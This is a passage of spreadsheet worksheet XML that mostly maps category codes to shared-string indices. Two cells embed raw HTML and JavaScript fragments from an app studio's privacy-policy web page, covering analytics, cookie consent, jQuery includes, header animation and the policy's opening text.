        <v>2768</v>
      </c>
    </row>
    <row r="6258" spans="1:2">
      <c r="A6258" t="s">
        <v>105</v>
      </c>
      <c r="B6258" t="s">
        <v>2769</v>
      </c>
    </row>
    <row r="6259" spans="1:2">
      <c r="A6259" t="s">
        <v>105</v>
      </c>
      <c r="B6259" t="s">
        <v>2770</v>
      </c>
    </row>
    <row r="6260" spans="1:2">
      <c r="A6260" t="s">
        <v>105</v>
      </c>
      <c r="B6260" t="s">
        <v>2771</v>
      </c>
    </row>
    <row r="6261" spans="1:2">
      <c r="A6261" t="s">
        <v>105</v>
      </c>
      <c r="B6261" t="s">
        <v>2772</v>
      </c>
    </row>
    <row r="6262" spans="1:2">
      <c r="A6262" t="s">
        <v>105</v>
      </c>
      <c r="B6262" t="s">
        <v>2773</v>
      </c>
    </row>
    <row r="6263" spans="1:2">
      <c r="A6263" t="s">
        <v>105</v>
      </c>
      <c r="B6263" t="s">
        <v>2774</v>
      </c>
    </row>
    <row r="6264" spans="1:2">
      <c r="A6264" t="s">
        <v>105</v>
      </c>
      <c r="B6264" t="s">
        <v>2775</v>
      </c>
    </row>
    <row r="6265" spans="1:2">
      <c r="A6265" t="s">
        <v>105</v>
      </c>
      <c r="B6265" t="s">
        <v>2776</v>
      </c>
    </row>
    <row r="6266" spans="1:2">
      <c r="A6266" t="s">
        <v>105</v>
      </c>
      <c r="B6266" t="s">
        <v>2768</v>
      </c>
    </row>
    <row r="6267" spans="1:2">
      <c r="A6267" t="s">
        <v>105</v>
      </c>
      <c r="B6267" t="s">
        <v>2777</v>
      </c>
    </row>
    <row r="6268" spans="1:2">
      <c r="A6268" t="s">
        <v>105</v>
      </c>
      <c r="B6268" t="s">
        <v>2778</v>
      </c>
    </row>
    <row r="6269" spans="1:2">
      <c r="A6269" t="s">
        <v>105</v>
      </c>
      <c r="B6269" t="s">
        <v>2779</v>
      </c>
    </row>
    <row r="6270" spans="1:2">
      <c r="A6270" t="s">
        <v>105</v>
      </c>
      <c r="B6270" t="s">
        <v>2780</v>
      </c>
    </row>
    <row r="6271" spans="1:2">
      <c r="A6271" t="s">
        <v>105</v>
      </c>
      <c r="B6271" t="s">
        <v>2781</v>
      </c>
    </row>
    <row r="6272" spans="1:2">
      <c r="A6272" t="s">
        <v>105</v>
      </c>
      <c r="B6272" t="s">
        <v>2782</v>
      </c>
    </row>
    <row r="6273" spans="1:2">
      <c r="A6273" t="s">
        <v>105</v>
      </c>
      <c r="B6273" t="s">
        <v>2783</v>
      </c>
    </row>
    <row r="6274" spans="1:2">
      <c r="A6274" t="s">
        <v>105</v>
      </c>
      <c r="B6274" t="s">
        <v>2784</v>
      </c>
    </row>
    <row r="6275" spans="1:2">
      <c r="A6275" t="s">
        <v>105</v>
      </c>
      <c r="B6275" t="s">
        <v>2785</v>
      </c>
    </row>
    <row r="6276" spans="1:2">
      <c r="A6276" t="s">
        <v>105</v>
      </c>
      <c r="B6276" t="s">
        <v>2786</v>
      </c>
    </row>
    <row r="6277" spans="1:2">
      <c r="A6277" t="s">
        <v>105</v>
      </c>
      <c r="B6277" t="s">
        <v>2787</v>
      </c>
    </row>
    <row r="6278" spans="1:2">
      <c r="A6278" t="s">
        <v>105</v>
      </c>
      <c r="B6278" t="s">
        <v>2788</v>
      </c>
    </row>
    <row r="6279" spans="1:2">
      <c r="A6279" t="s">
        <v>105</v>
      </c>
      <c r="B6279" t="s">
        <v>2789</v>
      </c>
    </row>
    <row r="6280" spans="1:2">
      <c r="A6280" t="s">
        <v>105</v>
      </c>
      <c r="B6280" t="s">
        <v>3804</v>
      </c>
    </row>
    <row r="6281" spans="1:2">
      <c r="A6281" t="s">
        <v>105</v>
      </c>
      <c r="B6281" t="s">
        <v>2791</v>
      </c>
    </row>
    <row r="6282" spans="1:2">
      <c r="A6282" t="s">
        <v>105</v>
      </c>
      <c r="B6282" t="s">
        <v>2792</v>
      </c>
    </row>
    <row r="6283" spans="1:2">
      <c r="A6283" t="s">
        <v>105</v>
      </c>
      <c r="B6283" t="s">
        <v>2793</v>
      </c>
    </row>
    <row r="6284" spans="1:2">
      <c r="A6284" t="s">
        <v>105</v>
      </c>
      <c r="B6284" t="s">
        <v>2794</v>
      </c>
    </row>
    <row r="6285" spans="1:2">
      <c r="A6285" t="s">
        <v>105</v>
      </c>
      <c r="B6285" t="s">
        <v>2795</v>
      </c>
    </row>
    <row r="6286" spans="1:2">
      <c r="A6286" t="s">
        <v>105</v>
      </c>
      <c r="B6286" t="s">
        <v>2796</v>
      </c>
    </row>
    <row r="6287" spans="1:2">
      <c r="A6287" t="s">
        <v>105</v>
      </c>
      <c r="B6287" t="s">
        <v>2797</v>
      </c>
    </row>
    <row r="6288" spans="1:2">
      <c r="A6288" t="s">
        <v>105</v>
      </c>
      <c r="B6288" t="s">
        <v>2798</v>
      </c>
    </row>
    <row r="6289" spans="1:2">
      <c r="A6289" t="s">
        <v>105</v>
      </c>
      <c r="B6289" t="s">
        <v>2799</v>
      </c>
    </row>
    <row r="6290" spans="1:2">
      <c r="A6290" t="s">
        <v>105</v>
      </c>
      <c r="B6290" t="s">
        <v>2800</v>
      </c>
    </row>
    <row r="6291" spans="1:2">
      <c r="A6291" t="s">
        <v>105</v>
      </c>
      <c r="B6291" t="s">
        <v>2801</v>
      </c>
    </row>
    <row r="6292" spans="1:2">
      <c r="A6292" t="s">
        <v>105</v>
      </c>
      <c r="B6292" t="s">
        <v>2802</v>
      </c>
    </row>
    <row r="6293" spans="1:2">
      <c r="A6293" t="s">
        <v>105</v>
      </c>
      <c r="B6293" t="s">
        <v>2803</v>
      </c>
    </row>
    <row r="6294" spans="1:2">
      <c r="A6294" t="s">
        <v>105</v>
      </c>
      <c r="B6294" t="s">
        <v>2804</v>
      </c>
    </row>
    <row r="6295" spans="1:2">
      <c r="A6295" t="s">
        <v>105</v>
      </c>
      <c r="B6295" t="s">
        <v>2805</v>
      </c>
    </row>
    <row r="6296" spans="1:2">
      <c r="A6296" t="s">
        <v>5</v>
      </c>
      <c r="B6296" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="6297" spans="1:2">
      <c r="A6297" t="s">
        <v>5</v>
      </c>
      <c r="B6297" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="6298" spans="1:2">
      <c r="A6298" t="s">
        <v>5</v>
      </c>
      <c r="B6298" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="6299" spans="1:2">
      <c r="A6299" t="s">
        <v>5</v>
      </c>
      <c r="B6299" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="6300" spans="1:2">
      <c r="A6300" t="s">
        <v>5</v>
      </c>
      <c r="B6300" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="6301" spans="1:2">
      <c r="A6301" t="s">
        <v>5</v>
      </c>
      <c r="B6301" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="6302" spans="1:2">
      <c r="A6302" t="s">
        <v>5</v>
      </c>
      <c r="B6302" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="6303" spans="1:2">
      <c r="A6303" t="s">
        <v>5</v>
      </c>
      <c r="B6303">
        <f> window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-84213520-6');
&lt;/script&gt; --&gt;
&lt;script&gt;
    window.addEventListener("load", function(){
        window.cookieconsent.initialise({
            "palette": {
                "popup": {
                    "background": "#000"
                },
                "button": {
                    "background": "#f1d600"
                }
            },
            "position": "bottom-left"
        })});
&lt;/script&gt;
&lt;!-- All JS --&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-1.11.0.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-migrate-1.2.1.min.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/greensock.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.easing.1.3.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.transitions.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.kreaturamedia.jquery.js " defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/cookieconsent.min.js"&gt;&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="6304" spans="1:2">
      <c r="A6304" t="s">
        <v>5</v>
      </c>
      <c r="B6304" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="6305" spans="1:2">
      <c r="A6305" t="s">
        <v>5</v>
      </c>
      <c r="B6305" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="6306" spans="1:2">
      <c r="A6306" t="s">
        <v>5</v>
      </c>
      <c r="B6306" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="6307" spans="1:2">
      <c r="A6307" t="s">
        <v>5</v>
      </c>
      <c r="B6307" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="6308" spans="1:2">
      <c r="A6308" t="s">
        <v>5</v>
      </c>
      <c r="B6308" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="6309" spans="1:2">
      <c r="A6309" t="s">
        <v>5</v>
      </c>
      <c r="B6309" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="6310" spans="1:2">
      <c r="A6310" t="s">
        <v>5</v>
      </c>
      <c r="B6310" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="6311" spans="1:2">
      <c r="A6311" t="s">
        <v>5</v>
      </c>
      <c r="B6311" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="6312" spans="1:2">
      <c r="A6312" t="s">
        <v>5</v>
      </c>
      <c r="B6312" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="6313" spans="1:2">
      <c r="A6313" t="s">
        <v>5</v>
      </c>
      <c r="B6313" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="6314" spans="1:2">
      <c r="A6314" t="s">
        <v>5</v>
      </c>
      <c r="B6314">
        <f> $(window).scrollTop();
    if (scrollTop &gt; 249) {
        // $('.header').addClass('fadeOutLeft');
        // $('.header').removeClass('fadeInLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeOutUp');
        $('.header-sticky').addClass('animated');      
    } else {
        // $('.header').addClass('fadeInLeft');
        // $('.header').removeClass('fadeOutLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeInDown');
    }
  });
});
&lt;/script&gt;
&lt;style type="text/css"&gt;
.header-sticky.fadeInDown {
    position: fixed;
    width: 100%;
    opacity: 0;
    z-index: 999;
}
&lt;/style&gt;
    &lt;div class="page-banner" style="background-image: url(https://gunjanappstudios.com/public/uploads/banner_privacy.png)"&gt;
        &lt;div class="bg-page"&gt;&lt;/div&gt;
        &lt;div class="text"&gt;
            &lt;h1&gt;Privacy Policy&lt;/h1&gt;
            &lt;nav aria-label="breadcrumb"&gt;
                &lt;ol class="breadcrumb justify-content-center"&gt;
                    &lt;li class="breadcrumb-item"&gt;&lt;a href="https://gunjanappstudios.com"&gt;Home&lt;/a&gt;&lt;/li&gt;
                    &lt;li class="breadcrumb-item active" aria-current="page"&gt;Privacy Policy&lt;/li&gt;
                &lt;/ol&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
        &lt;div id="privacy-policy"&gt;&lt;/div&gt;
    &lt;/div&gt;
    &lt;!--mobile banner--&gt;
    &lt;div class="mobile-banner"&gt;
        &lt;img src="https://gunjanappstudios.com/public/uploads/banner_privacy_mobile.png"&gt;
    &lt;/div&gt;
    &lt;div class="page-content"&gt;
        &lt;div class="container"&gt;
            &lt;div class="heading"&gt;
                &lt;h2 class="heding_s"&gt;Privacy Policy&lt;/h2&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-md-12"&gt;
                    &lt;p&gt;_x000D_
                        &lt;b&gt;Privacy Policy&lt;/b&gt;_x000D_
                        &lt;br&gt;_x000D_
                    &lt;/p&gt;_x000D_
                    &lt;p&gt;We respect and value your privacy here at GunjanApps Studios.&lt;/p&gt;_x000D_
                    &lt;p&gt;Our Privacy Policy describes the information collected by our company GunjanApps Studios, and our partners, through our mobile applications and the use of the information.&lt;/p&gt;_x000D_
                    &lt;p&gt;</f>
        <v>0</v>
      </c>
    </row>
    <row r="6315" spans="1:2">
      <c r="A6315" t="s">
        <v>5</v>
      </c>
      <c r="B6315" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="6316" spans="1:2">
      <c r="A6316" t="s">
        <v>5</v>
      </c>
      <c r="B6316" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="6317" spans="1:2">
      <c r="A6317" t="s">
        <v>5</v>
      </c>
      <c r="B6317" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="6318" spans="1:2">
      <c r="A6318" t="s">
        <v>5</v>
      </c>
      <c r="B6318" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="6319" spans="1:2">
      <c r="A6319" t="s">
        <v>5</v>
      </c>
      <c r="B6319" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="6320" spans="1:2">
      <c r="A6320" t="s">
        <v>5</v>
      </c>
      <c r="B6320" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="6321" spans="1:2">
      <c r="A6321" t="s">
        <v>5</v>
      </c>
      <c r="B6321" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="6322" spans="1:2">
      <c r="A6322" t="s">
        <v>5</v>
      </c>
      <c r="B6322" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="6323" spans="1:2">
      <c r="A6323" t="s">
        <v>5</v>
      </c>
      <c r="B6323" t="s">
        <v>341</v>
      </c>
    </row>
    <row r="6324" spans="1:2">
      <c r="A6324" t="s">
        <v>5</v>
      </c>
      <c r="B6324" t="s">
        <v>342</v>
      </c>
    </row>
    <row r="6325" spans="1:2">
      <c r="A6325" t="s">
        <v>4</v>
      </c>
      <c r="B6325" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="6326" spans="1:2">
      <c r="A6326" t="s">
        <v>4</v>
      </c>
      <c r="B6326" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="6327" spans="1:2">
      <c r="A6327" t="s">
        <v>4</v>
      </c>
      <c r="B6327" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="6328" spans="1:2">
      <c r="A6328" t="s">
        <v>4</v>
      </c>
      <c r="B6328" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="6329" spans="1:2">
      <c r="A6329" t="s">
        <v>4</v>
      </c>
      <c r="B6329" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="6330" spans="1:2">
      <c r="A6330" t="s">
        <v>4</v>
      </c>
      <c r="B6330" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="6331" spans="1:2">
      <c r="A6331" t="s">
        <v>4</v>
      </c>
      <c r="B6331" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="6332" spans="1:2">
      <c r="A6332" t="s">
        <v>4</v>
      </c>
      <c r="B6332" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="6333" spans="1:2">
      <c r="A6333" t="s">
        <v>4</v>
      </c>
      <c r="B6333" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="6334" spans="1:2">
      <c r="A6334" t="s">
        <v>4</v>
      </c>
      <c r="B6334" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="6335" spans="1:2">
      <c r="A6335" t="s">
        <v>4</v>
      </c>
      <c r="B6335" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="6336" spans="1:2">
      <c r="A6336" t="s">
        <v>4</v>
      </c>
      <c r="B6336" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="6337" spans="1:2">
      <c r="A6337" t="s">
        <v>4</v>
      </c>
      <c r="B6337" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="6338" spans="1:2">
      <c r="A6338" t="s">
        <v>4</v>
      </c>
      <c r="B6338" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="6339" spans="1:2">
      <c r="A6339" t="s">
        <v>4</v>
      </c>
      <c r="B6339" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="6340" spans="1:2">
      <c r="A6340" t="s">
        <v>4</v>
      </c>
      <c r="B6340" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="6341" spans="1:2">
      <c r="A6341" t="s">
        <v>4</v>
      </c>
      <c r="B6341" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="6342" spans="1:2">
      <c r="A6342" t="s">
        <v>4</v>
      </c>
      <c r="B6342" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="6343" spans="1:2">
      <c r="A6343" t="s">
        <v>4</v>
      </c>
      <c r="B6343" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="6344" spans="1:2">
      <c r="A6344" t="s">
        <v>4</v>
      </c>
      <c r="B6344" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="6345" spans="1:2">
      <c r="A6345" t="s">
        <v>4</v>
      </c>
      <c r="B6345" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="6346" spans="1:2">
      <c r="A6346" t="s">
        <v>4</v>
      </c>
      <c r="B6346" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="6347" spans="1:2">
      <c r="A6347" t="s">
        <v>4</v>
      </c>
      <c r="B6347" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="6348" spans="1:2">
      <c r="A6348" t="s">
        <v>4</v>
      </c>
      <c r="B6348" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="6349" spans="1:2">
      <c r="A6349" t="s">
        <v>151</v>
      </c>
      <c r="B6349" t="s">
        <v>3805</v>
      </c>
    </row>
    <row r="6350" spans="1:2">
      <c r="A6350" t="s">
        <v>151</v>
      </c>
      <c r="B6350" t="s">
        <v>3806</v>
      </c>
    </row>
    <row r="6351" spans="1:2">
      <c r="A6351" t="s">
        <v>151</v>
      </c>
      <c r="B6351" t="s">
        <v>3807</v>
      </c>
    </row>
    <row r="6352" spans="1:2">
      <c r="A6352" t="s">
        <v>151</v>
      </c>
      <c r="B6352" t="s">
        <v>3808</v>
      </c>
    </row>
    <row r="6353" spans="1:2">
      <c r="A6353" t="s">
        <v>151</v>
      </c>
      <c r="B6353" t="s">
        <v>3809</v>
      </c>
    </row>
    <row r="6354" spans="1:2">
      <c r="A6354" t="s">
        <v>151</v>
      </c>
      <c r="B6354" t="s">
        <v>3810</v>
      </c>
    </row>
    <row r="6355" spans="1:2">
      <c r="A6355" t="s">
        <v>151</v>
      </c>
      <c r="B6355" t="s">
        <v>3811</v>
      </c>
    </row>
    <row r="6356" spans="1:2">
      <c r="A6356" t="s">
        <v>151</v>
      </c>
      <c r="B6356" t="s">
        <v>3812</v>
      </c>
    </row>
    <row r="6357" spans="1:2">
      <c r="A6357" t="s">
        <v>151</v>
      </c>
      <c r="B6357" t="s">
        <v>3813</v>
      </c>
    </row>
    <row r="6358" spans="1:2">
      <c r="A6358" t="s">
        <v>151</v>
      </c>
      <c r="B6358" t="s">
        <v>3814</v>
      </c>
    </row>
    <row r="6359" spans="1:2">
      <c r="A6359" t="s">
        <v>151</v>
      </c>
      <c r="B6359" t="s">
        <v>3815</v>
      </c>
    </row>
    <row r="6360" spans="1:2">
      <c r="A6360" t="s">
        <v>151</v>
      </c>
      <c r="B6360" t="s">
        <v>3816</v>
      </c>
    </row>
    <row r="6361" spans="1:2">
      <c r="A6361" t="s">
        <v>152</v>
      </c>
      <c r="B6361" t="s">
        <v>3817</v>
      </c>
    </row>
    <row r="6362" spans="1:2">
      <c r="A6362" t="s">
        <v>152</v>
      </c>
      <c r="B6362" t="s">
        <v>3818</v>
      </c>
    </row>
    <row r="6363" spans="1:2">
      <c r="A6363" t="s">
        <v>152</v>
      </c>
      <c r="B6363" t="s">
        <v>3819</v>
      </c>
    </row>
    <row r="6364" spans="1:2">
      <c r="A6364" t="s">
        <v>152</v>
      </c>
      <c r="B6364" t="s">
        <v>3820</v>
      </c>
    </row>
    <row r="6365" spans="1:2">
      <c r="A6365" t="s">
        <v>152</v>
      </c>
      <c r="B6365" t="s">
        <v>3821</v>
      </c>
    </row>
    <row r="6366" spans="1:2">
      <c r="A6366" t="s">
        <v>152</v>
      </c>
      <c r="B6366" t="s">
        <v>3822</v>
      </c>
    </row>
    <row r="6367" spans="1:2">
      <c r="A6367" t="s">
        <v>152</v>
      </c>
      <c r="B6367" t="s">
        <v>3823</v>
      </c>
    </row>
    <row r="6368" spans="1:2">
      <c r="A6368" t="s">
        <v>152</v>
      </c>
      <c r="B6368" t="s">
        <v>3824</v>
      </c>
    </row>
    <row r="6369" spans="1:2">
      <c r="A6369" t="s">
        <v>152</v>
      </c>
      <c r="B6369" t="s">
        <v>3825</v>
      </c>
    </row>
    <row r="6370" spans="1:2">
      <c r="A6370" t="s">
        <v>152</v>
      </c>
      <c r="B6370" t="s">
        <v>3826</v>
      </c>
    </row>
    <row r="6371" spans="1:2">
      <c r="A6371" t="s">
        <v>152</v>
      </c>
      <c r="B6371" t="s">
        <v>3827</v>
      </c>
    </row>
    <row r="6372" spans="1:2">
      <c r="A6372" t="s">
        <v>152</v>
      </c>
      <c r="B6372" t="s">
        <v>3828</v>
      </c>
    </row>
    <row r="6373" spans="1:2">
      <c r="A6373" t="s">
        <v>152</v>
      </c>
      <c r="B6373" t="s">
        <v>3829</v>
      </c>
    </row>
    <row r="6374" spans="1:2">
      <c r="A6374" t="s">
        <v>152</v>
      </c>
      <c r="B6374" t="s">
        <v>3830</v>
      </c>
    </row>
    <row r="6375" spans="1:2">
      <c r="A6375" t="s">
        <v>152</v>
      </c>
      <c r="B6375" t="s">
        <v>3831</v>
      </c>
    </row>
    <row r="6376" spans="1:2">
      <c r="A6376" t="s">
        <v>152</v>
      </c>
      <c r="B6376" t="s">
        <v>3832</v>
      </c>
    </row>
    <row r="6377" spans="1:2">
      <c r="A6377" t="s">
        <v>152</v>
      </c>
      <c r="B6377" t="s">
        <v>3833</v>
      </c>
    </row>
    <row r="6378" spans="1:2">
      <c r="A6378" t="s">
        <v>152</v>
      </c>
      <c r="B6378" t="s">
        <v>3834</v>
      </c>
    </row>
    <row r="6379" spans="1:2">
      <c r="A6379" t="s">
        <v>152</v>
      </c>
      <c r="B6379" t="s">
        <v>3835</v>
      </c>
    </row>
    <row r="6380" spans="1:2">
      <c r="A6380" t="s">
        <v>152</v>
      </c>
      <c r="B6380" t="s">
        <v>3836</v>
      </c>
    </row>
    <row r="6381" spans="1:2">
      <c r="A6381" t="s">
        <v>152</v>
      </c>
      <c r="B6381" t="s">
        <v>3837</v>
      </c>
    </row>
    <row r="6382" spans="1:2">
      <c r="A6382" t="s">
        <v>152</v>
      </c>
      <c r="B6382" t="s">
        <v>3838</v>
      </c>
    </row>
    <row r="6383" spans="1:2">
      <c r="A6383" t="s">
        <v>152</v>
      </c>
      <c r="B6383" t="s">
        <v>3839</v>
      </c>
    </row>
    <row r="6384" spans="1:2">
      <c r="A6384" t="s">
        <v>152</v>
      </c>
      <c r="B6384" t="s">
        <v>3840</v>
      </c>
    </row>
    <row r="6385" spans="1:2">
      <c r="A6385" t="s">
        <v>152</v>
      </c>
      <c r="B6385" t="s">
        <v>3841</v>
      </c>
    </row>
    <row r="6386" spans="1:2">
      <c r="A6386" t="s">
        <v>54</v>
      </c>
      <c r="B6386" t="s">
        <v>1520</v>
      </c>
    </row>
    <row r="6387" spans="1:2">
      <c r="A6387" t="s">
        <v>54</v>
      </c>
      <c r="B6387" t="s">
        <v>1521</v>
      </c>
    </row>
    <row r="6388" spans="1:2">
      <c r="A6388" t="s">
        <v>54</v>
      </c>
      <c r="B6388" t="s">
        <v>1522</v>
      </c>
    </row>
    <row r="6389" spans="1:2">
      <c r="A6389" t="s">
        <v>54</v>
      </c>
      <c r="B6389" t="s">
        <v>1523</v>
      </c>
    </row>
    <row r="6390" spans="1:2">
      <c r="A6390" t="s">
        <v>54</v>
      </c>
      <c r="B6390" t="s">
        <v>1524</v>
      </c>
    </row>
    <row r="6391" spans="1:2">
      <c r="A6391" t="s">
        <v>54</v>
      </c>
      <c r="B6391" t="s">
        <v>1525</v>
      </c>
    </row>
    <row r="6392" spans="1:2">
      <c r="A6392" t="s">
        <v>54</v>
      </c>
      <c r="B6392" t="s">
        <v>1526</v>
      </c>
    </row>
    <row r="6393" spans="1:2">
      <c r="A6393" t="s">
        <v>54</v>
      </c>
      <c r="B6393" t="s">
        <v>3842</v>
      </c>
    </row>
    <row r="6394" spans="1:2">
      <c r="A6394" t="s">
        <v>54</v>
      </c>
      <c r="B6394" t="s">
        <v>1528</v>
      </c>
    </row>
    <row r="6395" spans="1:2">
      <c r="A6395" t="s">
        <v>54</v>
      </c>
      <c r="B6395" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="6396" spans="1:2">
      <c r="A6396" t="s">
        <v>54</v>
      </c>
      <c r="B6396" t="s">
        <v>1530</v>
      </c>
    </row>
    <row r="6397" spans="1:2">
      <c r="A6397" t="s">
        <v>54</v>
      </c>
      <c r="B6397" t="s">
        <v>1531</v>
      </c>
    </row>
    <row r="6398" spans="1:2">
      <c r="A6398" t="s">
        <v>54</v>
      </c>
      <c r="B6398" t="s">
        <v>1532</v>
      </c>
    </row>
    <row r="6399" spans="1:2">
      <c r="A6399" t="s">
        <v>54</v>
      </c>
      <c r="B6399" t="s">
        <v>1533</v>
      </c>
    </row>
    <row r="6400" spans="1:2">
      <c r="A6400" t="s">
        <v>54</v>
      </c>
      <c r="B6400" t="s">
        <v>1534</v>
      </c>
    </row>
    <row r="6401" spans="1:2">
      <c r="A6401" t="s">
        <v>54</v>
      </c>
      <c r="B6401" t="s">
        <v>1535</v>
      </c>
    </row>
    <row r="6402" spans="1:2">
      <c r="A6402" t="s">
        <v>54</v>
      </c>
      <c r="B6402" t="s">
        <v>1536</v>
      </c>
    </row>
    <row r="6403" spans="1:2">
      <c r="A6403" t="s">
        <v>54</v>
      </c>
      <c r="B6403" t="s">
        <v>1537</v>
      </c>
    </row>
    <row r="6404" spans="1:2">
      <c r="A6404" t="s">
        <v>54</v>
      </c>
      <c r="B6404" t="s">
        <v>1538</v>
      </c>
    </row>
    <row r="6405" spans="1:2">
      <c r="A6405" t="s">
        <v>54</v>
      </c>
      <c r="B6405" t="s">
        <v>3843</v>
      </c>
    </row>
    <row r="6406" spans="1:2">
      <c r="A6406" t="s">
        <v>54</v>
      </c>
      <c r="B6406" t="s">
        <v>1540</v>
      </c>
    </row>
    <row r="6407" spans="1:2">
      <c r="A6407" t="s">
        <v>54</v>
      </c>
      <c r="B6407" t="s">
        <v>1541</v>
      </c>
    </row>
    <row r="6408" spans="1:2">
      <c r="A6408" t="s">
        <v>54</v>
      </c>
      <c r="B6408" t="s">
        <v>1542</v>
      </c>
    </row>
    <row r="6409" spans="1:2">
      <c r="A6409" t="s">
        <v>54</v>
      </c>
      <c r="B6409" t="s">
        <v>1543</v>
      </c>
    </row>
    <row r="6410" spans="1:2">
      <c r="A6410" t="s">
        <v>54</v>
      </c>
      <c r="B6410" t="s">
        <v>1544</v>
      </c>
    </row>
    <row r="6411" spans="1:2">
      <c r="A6411" t="s">
        <v>54</v>
      </c>
      <c r="B6411" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="6412" spans="1:2">
      <c r="A6412" t="s">
        <v>54</v>
      </c>
      <c r="B6412" t="s">
        <v>1546</v>
      </c>
    </row>
    <row r="6413" spans="1:2">
      <c r="A6413" t="s">
        <v>54</v>
      </c>
      <c r="B6413" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="6414" spans="1:2">
      <c r="A6414" t="s">
        <v>54</v>
      </c>
      <c r="B6414" t="s">
        <v>1548</v>
      </c>
    </row>
    <row r="6415" spans="1:2">
      <c r="A6415" t="s">
        <v>54</v>
      </c>
      <c r="B6415" t="s">
        <v>1549</v>
      </c>
    </row>
    <row r="6416" spans="1:2">
      <c r="A6416" t="s">
        <v>54</v>
      </c>
      <c r="B6416" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="6417" spans="1:2">
      <c r="A6417" t="s">
        <v>54</v>
      </c>
      <c r="B6417" t="s">
        <v>1551</v>
      </c>
    </row>
    <row r="6418" spans="1:2">
      <c r="A6418" t="s">
        <v>54</v>
      </c>
      <c r="B6418" t="s">
        <v>1552</v>
      </c>
    </row>
    <row r="6419" spans="1:2">
      <c r="A6419" t="s">
        <v>54</v>
      </c>
      <c r="B6419" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="6420" spans="1:2">
      <c r="A6420" t="s">
        <v>54</v>
      </c>
      <c r="B6420" t="s">
        <v>1554</v>
      </c>
    </row>
    <row r="6421" spans="1:2">
      <c r="A6421" t="s">
        <v>54</v>
      </c>
      <c r="B6421" t="s">
        <v>1555</v>
      </c>
    </row>
    <row r="6422" spans="1:2">
      <c r="A6422" t="s">
        <v>54</v>
      </c>
      <c r="B6422" t="s">
        <v>1556</v>
      </c>
    </row>
    <row r="6423" spans="1:2">
      <c r="A6423" t="s">
        <v>54</v>
      </c>
      <c r="B6423" t="s">
        <v>1557</v>
      </c>
    </row>
    <row r="6424" spans="1:2">
      <c r="A6424" t="s">
        <v>54</v>
      </c>
      <c r="B6424" t="s">
        <v>1558</v>
      </c>
    </row>
    <row r="6425" spans="1:2">
      <c r="A6425" t="s">
        <v>54</v>
      </c>
      <c r="B6425" t="s">
        <v>1559</v>
      </c>
    </row>
    <row r="6426" spans="1:2">
      <c r="A6426" t="s">
        <v>54</v>
      </c>
      <c r="B6426" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="6427" spans="1:2">
      <c r="A6427" t="s">
        <v>54</v>
      </c>
      <c r="B6427" t="s">
        <v>3844</v>
      </c>
    </row>
